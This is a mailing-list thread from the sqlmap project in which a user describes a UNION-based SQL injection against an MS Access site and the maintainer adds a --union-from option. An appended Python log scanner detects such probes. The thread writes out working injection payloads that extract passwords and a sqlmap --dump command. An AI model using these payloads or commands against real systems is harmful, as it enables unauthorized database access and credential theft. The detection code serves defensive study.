Hi Buawig.
Implemented as requested [1].
Now, in your case, you can (e.g.) use --union-from=foobar, which will
enforce the use of the table name foobar in UNION query injection payloads.
Kind regards,
Miroslav Stampar
[1] https://github.com/sqlmapproject/sqlmap/issues/423
On Tue, Mar 19, 2013 at 8:34 PM, buawig <bua...@gmail.com> wrote:
>
> Hi,
>
> I've got a simple union based sqli (resulting webpage shows only one
> entry/row).
>
> Valid statements that show the numbers in the resulting html page:
>
> ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
> ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
>
> - foobar is an existing table (gathered via error messages in html)
> - password is a valid column in the foobar table
>
> The following URL gives you one password:
>
> ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
> from foobar
>
>
> Now I wanted to hand over to sqlmap to dump all passwords:
>
> sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
> --dump
>
> which did not work out (0 entries retrieved), but it was confirmed
> that the table has several hundred entries.
>
> - sqlmap was able to detect the number of columns is 13 (correct)
> - sqlmap confirmed a boolean-based blind sqli vulnerability (but no
> UNION based sqli)
> - sqlmap was able to confirm the existence of table name (with --tables)
> (echo foobar > txt/common-tables.txt)
> - sqlmap was able to confirm the existence of column name password
> (with --columns)
>
> When running something like:
> --technique=U --union-cols=13 --union-char=1
>
> sqlmap requested something *like*:
>
> ...id=-123 union all select
> 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
> MSysAccessObjects%00
>
> which results in the following error message (shown in the html page):
>
> The Microsoft Jet database engine cannot find the input table or query
> 'MSysAccessObjects'. Make sure it exists and that its name is spelled
> correctly.
>
> So if sqlmap would accept a known tablename on the command line that
> it would use to detect/confirm the union based sqli vuln, instead of
> using "MSysAccessObjects" this would make sqlmap more useful
> (or simply use the table name specified in -T or previously
> bruteforced to detect union-based sqli).
>
> thanks!
>
> PS: I did *not* run sqlmap with special --risk/--level because I don't
> want to send several unneeded http requests if the vulnerability is
> already confirmed (manually). I'm using sqlmap mainly for exploitation
> (not so much for detection) and would appreciate if the user could
> tell sqlmap how to exploit a certain sqli (something that is already
> partially given with --technique, --union-cols, --union-chars).
>
> I did use 1.0-dev-d1ae62b.
>
> ref:
> http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
>
> http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
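An added example (not part of this thread and not sqlmap project code) from the defender's side: a small access-log scanner that flags the UNION-based requests quoted in the thread and reports the MS Access specific markers they carry (CHR() concatenation, a trailing null byte, the MSysAccessObjects system table). The page.asp path and the three log lines are constructed; the log format is assumed to be Apache combined style.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined style, abbreviated). The second
# line is the manual "top 1 ... password" query from the thread, the third is the
# sqlmap probe that referenced MSysAccessObjects and ended with a %00 null byte.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2013:20:30:01 +0100] "GET /page.asp?id=123 HTTP/1.1" 200 5120
10.0.0.5 - - [19/Mar/2013:20:30:02 +0100] "GET /page.asp?id=123%20union%20select%20top%201%201,2,3,4,5,6,password,8,9,10,11,12,13%20from%20foobar HTTP/1.1" 200 5130
10.0.0.5 - - [19/Mar/2013:20:30:03 +0100] "GET /page.asp?id=-123%20union%20all%20select%201,2,3,4,5,6,CHR(58)%26CHR(111)%26CHR(58),8,9,10,11,12,13%20from%20MSysAccessObjects%00 HTTP/1.1" 500 812
"""

UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)
CHR_RE = re.compile(r"CHR\(\d+\)\s*&\s*CHR\(\d+\)", re.IGNORECASE)
FROM_RE = re.compile(r"\bfrom\s+([A-Za-z_]\w*)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
STATUS_RE = re.compile(r'HTTP/\d\.\d"\s+(\d{3})')


def analyse_request(uri: str) -> Optional[dict]:
    """Return a finding for a UNION-style query string, or None if clean."""
    query = uri.partition("?")[2]
    # Decode once so %20, %26 (&) and %00 (null byte) are seen as the server would.
    decoded = unquote_plus(query)
    if not UNION_RE.search(decoded):
        return None
    table = FROM_RE.search(decoded)
    return {
        "chr_marker": bool(CHR_RE.search(decoded)),      # sqlmap-style CHR() marker
        "null_byte": "\x00" in decoded,                   # trailing %00 terminator
        "system_table": "msysaccessobjects" in decoded.lower(),
        "from_table": table.group(1) if table else None,  # table the UNION reads from
    }


def scan_log(log_text: str) -> list:
    """Scan log lines; return one finding per request that looks like a UNION probe."""
    findings = []
    for line in log_text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        finding = analyse_request(req.group(1))
        if finding:
            status = STATUS_RE.search(line)
            finding["status"] = status.group(1) if status else None
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A 500 response paired with a UNION that names MSysAccessObjects matches the Jet "cannot find the input table" error described in the thread, so the status code is worth keeping alongside the query markers.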